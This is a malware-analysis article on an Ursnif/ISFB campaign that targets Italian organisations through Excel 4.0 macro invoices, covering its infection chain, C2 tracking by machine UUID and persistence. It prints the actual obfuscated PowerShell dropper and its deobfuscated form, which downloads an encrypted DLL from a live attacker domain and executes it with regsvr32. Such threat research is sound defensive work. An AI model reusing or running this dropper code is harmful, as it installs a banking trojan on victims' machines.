Ursnif is one of the most and widespread threats, it is delivered through malspam campaigns aimed at multiple industries across Italy and Europe.
Recently, we have identified a new variant that is targeting Italian organizations. The malspam messages use attachments with subjects like “Avviso di Pagamento_xxxx_date” where xxxx is a number and date is a date reported in the format “dd-mm-yyyy” (i.e. “Avviso di Pagamento_14326_15_04_2020”). We spotted some major changes in the techniques employed in the Ursnif/ISFB droppers used in the campaign. Operators behind the campaign have adopted new techniques to avoid detection and propose important changes in the Ursnif infection chain.
The variant used in the campaign against Italian organizations contains some important “upgrades” compared with other samples of the Ursnif malware family and a significant evolution of the attack chain. First of all, the dropper uses Excel 4.0 macros (XLM macros) in the attempt to make it hard the detection by AVs, then it uses two different C2, one of them is only used for the registration of the victim machine identified by a UUID.
The following picture reports the Ursnif Infection chain that is used in this campaign:
Figure 1: Ursnif Infection Chain
This brand new Ursnif italian campaign is delivered as a malicious email attachment with XML macro embedded into it. Following, the static information of the dropper:
Hash | 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394 |
Threat | Ursnif XLS document dropper |
Size | 39.0 KB (39,936 bytes) |
Filetype | MS Excel Spreadsheet |
Brief Description | Ursnif XLS Document Dropper with malicious XML macros embedded into it |
Ssdeep | 768:Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq |
Table 1. Sample information
Once opened, the document looks like an invoice ready to be filled, it displays a “Visualize” button to trick victims into clicking on it and the infection starts. Upon clicking the “Visualizza” button would start all the malicious infection chains designed to compromise the target machine.
Figure 2: Overview of the document
Even if the document is structurally similar to other ones used to spread the malware in past malspam campaigns, its content stands out.
The security notice informs us that dynamic content is contained in the document, a deep inspection revealed the presence of some embedded EXCEL 4.0 macros (XML/XLF macros).
Figure 3: Piece of the malicious XLM Macro
The dynamic content is written in Powershell and it is split across multiple cells and then evaluated with some defined handler:
Figure: Evidence of the Executed code
The Frame1_Layout handler is triggered when the user clicks on “Allow Content”.
Then the malicious macro is re-assembled and the document prepares a window to display a message to the users informing him that the document is corrupted. When the user clicks on it, the macro kills the Excel process, but the Powershell continues its execution in the background.
The extracted macro represents the Ursnif Dropper, after reassembling it, looks like as shown in the figure:
sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+’X’-JoIN”) ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( ‘ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3+8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q+aHOPZ1Xde66+HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY+vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES+9ViqrhgrMnYHgC4pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf+L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT+5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k+Da4H/rgd9DsWPGczZ4nI00vnwb+cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh+lCN+1bpV+plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4+C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx+YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2CC4g6+wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM+ml6m+efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1+VD1XxHU+FCKucbZUkcyUSZBF5ox+rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu+ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA+ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8+axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=’ ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } ) |
Code snippet 1
After deobfuscating bit it looks like this:
$lk64bE= [type](“{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}” -F ‘RitH’,’OgrAP’,’URi’,’S’,’Ty.C’,’As’,’hY.H’,’YST’,’Em.sEc’,’M’,’HALgO’,’Rypt’) ; &(“{1}{0}”-f ‘et’,’S’) 1S7 ( [TyPe](“{3}{1}{2}{0}” -F ‘eNCOdING’,’TeX’,’t.’,’SysTEM.’) ) ; $9Sk2Z =[TyPE](“{1}{0}” -f ‘egEx’,’r’);${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}=”MD5″){${Hh}=.(‘uu’) (“{0}{1}{4}{5}{3}{2}” -f’S’,’ystem.Text.Stri’,’er’,’ld’,’n’,’gBui’); $lK64BE::(“{2}{1}{0}” -f ‘e’,’reat’,’C’).Invoke(${GH}).”cOMp`UTEhA`SH”( ( .(“{0}{2}{3}{1}”-f’G’,’E’,’et-v’,’ArIaBL’) 1S7 ).VAlUE::”uT`F8″.(“{1}{0}{2}”-f’etByt’,’G’,’es’).Invoke(${H`Y}))|.(‘%’){[Void]${h`H}.(“{0}{1}”-f’App’,’end’).Invoke(${_}.(“{0}{1}” -f’ToSt’,’ring’).Invoke(“x2”))};${HH}.(“{0}{1}” -f ‘ToS’,’tring’).Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&(“{1}{0}{2}”-f ‘et-Rando’,’G’,’m’) -Count 3|.(‘%’){[char]${_}})}while((&(‘th’)(${U})) -notlike ‘*’+${e`e});return ${U}};${x`D}=(“{2}{1}{0}” -f ‘t’,’adswif’,’uplo’);${h`z}=’ass’;${Q}=2;${di}=’pw’;function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=”};${B`I}= $9SK2Z::(“{1}{0}”-f ‘eplace’,’r’).Invoke(${t`Ik},’\d’,${x`D});if(&(“{2}{4}{1}{0}{3}” -f ‘ecti’,’onn’,’T’,’on’,’est-C’) (${BI}+${D`I}) -Count 1 -quiet){${bi}=”+’ht’+’tp’+(“{1}{0}”-f’/’,’s:/’)+${bi}+${dI}+’/’+${B`i}.(“{1}{2}{0}”-f’ring’,’Sub’,’st’).Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@((“{0}{1}”-f’new1′,’.’),”);function k`N{${LP}=’2al’+(&(‘ht’)((“{0}{1}” -f ‘*’,’6e1d’)))+(“{1}{0}” -f ‘.’,’ail’)+(.(‘ht’)((“{1}{0}”-f ‘b’,’*95f’)));return .(‘ts’)(${Lp})};${X`q}=.(‘tS’)(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&(‘Kn’)};${y}=.(‘uu’) (“{1}{0}{2}” -f’bC’,’Net.We’,’lient’);${y}.”He`AdeRs”.(“{1}{0}”-f’dd’,’A’).Invoke((“{0}{1}{2}” -f ‘Us’,’er-A’,’gent’), ((“{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}”-f ‘ozi’,’64; x64) AppleW’,’62’,’8.102 ‘,’7.’,’36 (‘,’it/5’,’0 (‘,’H’,’Window’,’Saf’,’Ge’,’7′,’c’,’183′,’hrome/70.0.353′,’M’,’T’,’ari’,’3′,’ebK’,’ ‘,’3′,’.36 Edge/’,’lla/’,’ML, ‘,’ko) C’,’18.’,’/5′,’like’,’K’,’s NT 10.0; Win’,’5.’)));${y}.(“{4}{0}{3}{1}{2}”-f’own’,’stri’,’ng’,’load’,’D’).Invoke(${Xq})|.( ([String]”.”ReM`o`Ve”)[45,12,27]-Join”) |
Code Snippet 2
The dropper uses base64 encoding, string substitution (sequences of multiple ‘{}’) and string capitalization (sequences of upper and lower case).
Once the macro is executed, the dropper will contact the newuploadswift [.]pw domain in order to download the next stage payload and executes it using the PowerShell engine. The next downloaded stage looks like below:
&((gV ‘*MDr*’).nAme[3,11,2]-JOiN”)( uu IO.strEaMREaDeR(( uu io.comPRESSiON.DeflATeSTrEaM([SYStEM.io.MeMORysTrEAM][cONVert]::FrOmBASe64STRinG( ‘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’), [iO.COmPREsSioN.coMprEssIOnmoDe]::dEcoMPrEss )) , [TexT.EncOdINg]::asciI) ).ReADtoenD( ) |
Code snippet 3
After de-obfuscating it, the powershell becomes:
function SDfiwe(${T`T}){${T`hL}=[regex]::(“{2}{0}{1}”-f ‘epl’,’ace’,’r’).Invoke(${tt},’\d’,”);return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::(“{0}{3}{2}{4}{1}” -f’F’,’tring’,’e64′,’romBas’,’S’).Invoke(${t`E});return ${Ii}};&(“{1}{0}”-f’l’,’sa’) Vu new-object;${l`LA}=$(&(“{0}{2}{3}{1}”-f’get-‘,’object’,’wm’,’i’) Win32_ComputerSystemProduct -computername . | &(“{0}{2}{1}”-f’Select-‘,’ject’,’Ob’) -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&(“{0}{1}” -f’gc’,’i’) ${a`zq}|&(“{1}{0}{2}”-f ‘d’,’get-ran’,’om’)).”na`mE” -replace “.{5}$”;${M`K}=(&(“{1}{0}”-f ‘i’,’Gc’) -path (((${A`zQ}.(“{0}{2}{1}” -f ‘to’,’ring’,’st’).Invoke()))) | &(“{2}{3}{0}{1}”-f ‘e-Obj’,’ect’,’W’,’her’) { ${_}.”pSis`cON`TAiner” }|.(“{2}{1}{0}”-f ‘lect’,’e’,’s’) fullname |.(“{1}{0}{2}”-f’ndo’,’Get-Ra’,’m’) -count 1).”FulLn`A`Me”+’\’+${f`BF}+’.’;function NiLL(${T`yO}){${k`j}=.(‘Vu’) IO.MemoryStream(,${t`yO});${m`m}=(.(‘Vu’) IO.StreamReader(&(‘Vu’) IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::”d`ECO`mPrESs”))).(“{1}{2}{0}”-f ‘nd’,’ReadT’,’oE’).Invoke();return ${M`M}};&(“{0}{1}” -f ‘s’,’al’) msq regsvr32;${S`U}=’using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create(“AES”);AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}’;.(“{0}{1}”-f’A’,’dd-Type’) -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+’?’+${L`LA};.(‘Sv’) 8 ${m};&(‘SV’) t0L (“{2}{3}{0}{1}”-f ‘ie’,’nt’,’Net’,’.WebCl’);.(‘Si’) Variable:B (&(‘Vu’) (&(“{0}{1}” -f ‘I’,’tem’) Variable:\t0L).”v`ALUe”);.(‘Sv’) D (“{2}{0}{1}” -f’adDa’,’ta’,’Downlo’);${f`DS}=(([byte[]](&(‘Gv’) B -Value).((&(‘LS’) Variable:D).”Va`LUE”).”IN`VOke”((&(‘GI’) Variable:8).”vAL`Ue”)));return &(“{0}{1}”-f ‘Ni’,’LL’)(${F`ds})};function kelv{${Fd}=&(“{1}{0}” -f ‘i’,’os’);${fd}=[Af]::(“{1}{0}”-f’e’,’ft’).Invoke(${Fd},${l`lA}.(“{2}{0}{1}”-f’ubstrin’,’g’,’s’).Invoke(0,16));${U}=${FD}.(“{1}{2}{0}” -f ‘tring’,’su’,’bs’).Invoke(0,1);${e`F}=${F`D}.(“{1}{0}”-f ’emove’,’r’).Invoke(0,1);${O`O}=${e`F} -split’!’;${vr}=[Text.Encoding]::”Ut`F8″;foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.(“{0}{1}{2}”-f’ToCharArr’,’a’,’y’).Invoke();${o}=&(“{1}{0}” -f ‘wE’,’Y’)(${O});for(${I}=0; ${i} -lt ${O}.”c`oUnT”; ${I}++){${o`Ut} += [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}.”COU`NT”])}};${SS}=${e`F}.”rep`lA`ce”((${o`O}[0]+”!”),${v`R}.”gE`TSTr`i`NG”(${O`UT}));return ${SS}};function gb{${k`I}=&(“{1}{0}”-f’lv’,’ke’);[io.file]::(“{0}{2}{1}”-f’Write’,’tes’,’AllBy’).Invoke(${m`K},(.(“{1}{0}” -f ‘E’,’Yw’)(${ki} -replace “.{200}$”)));if((&(“{1}{0}”-f ‘ci’,’g’) ${mk}).”Len`GtH” -lt 512){exit};&(“{0}{1}”-f’ms’,’q’) -s ${mK};.(“{0}{1}” -f’sle’,’ep’) 15;.(‘sl’);[io.file]::(“{2}{1}{0}” -f’ines’,’llL’,’WriteA’).Invoke(${m`k},(&(“{1}{0}”-f’Dfiwe’,’S’)(${l`LA})))};&(‘gb’) |
Code Snippet 4
At this point it is necessary to highlight a particular trick adopted by the malware to make the infection unique on the machine: in the previous code snippet, we have sees the creation of the UUID of the machine, which is passed to the same c2 as a parameter for the next GET request. In case the same UUID is used a second time, the server replies with an empty body. If the UUID is passed for the first time to the server, in turn, it provides the next stage of the infection, as shown in the previous figure.
Figure 4: Piece of the encrypted DLL downloaded from the DropURL
As seen in the previous figure, the body of the response is encrypted. It is decrypted by the AES routine shown in Code Snippet 4 (highlighted in red) and then executed through “regsrv32.exe” process.
The payload is as follows:
Hash | e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0 |
Threat | Ursnif Loader |
size | 289.50 KB (296448 bytes) |
Filetype | DLL |
Brief Description | Ursnif Loader to able to inject in memory |
Ssdeep | 6144:ydLG0cc+HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu+a:y5GjsEzaKG4XcLs3isu+a |
Imphash | f11ff0b8c499af0d98f00299b97339cf |
Table 2. Sample information
This component is the loader for the ursnif payload. It writes the following registry key at the path “HKCU\Software\AppDataLow\Software\Microsoft\Microsoft\[RANDOMID]” as persistence mechanism:
Figure 5: Registry key evidence
As the classic Ursnif malware infection, it sends the configuration string to the C2 encoded in Base64 format and encrypted with the Serpent algorithm. There are two ways to retrieve the configuration string: the first one is to decrypt it from the request sent to the C2, decrypting the serpent with the key extracted from the process memory; the second one is to look for the configuration string inside the process. In the end, the configuration of this Ursnif campaign is the following:
k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.* |
With our previous analysis we tracked the evolution of Ursnif TTPs over time. Some of the techniques used by the malware are rapidly evolving especially in the direction of evasion and anti-analysis.
This Italian campaign, while maintaining the same characteristics and capabilities of recent ones, uses xlm macros to low detection by AVs, and two different C2, one of which is deputy to track each infection with an unique UUID. This mechanism permit to better track the return of investment of the malicious campaign.
Additional details, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published by
https://yoroi.company/research/a-brand-new-ursnif-isfb-campaign-targets-italian-organizations/
[adrotate banner=”9″] | [adrotate banner=”12″] |
(SecurityAffairs – Ursnif, malware)
[adrotate banner=”5″]
[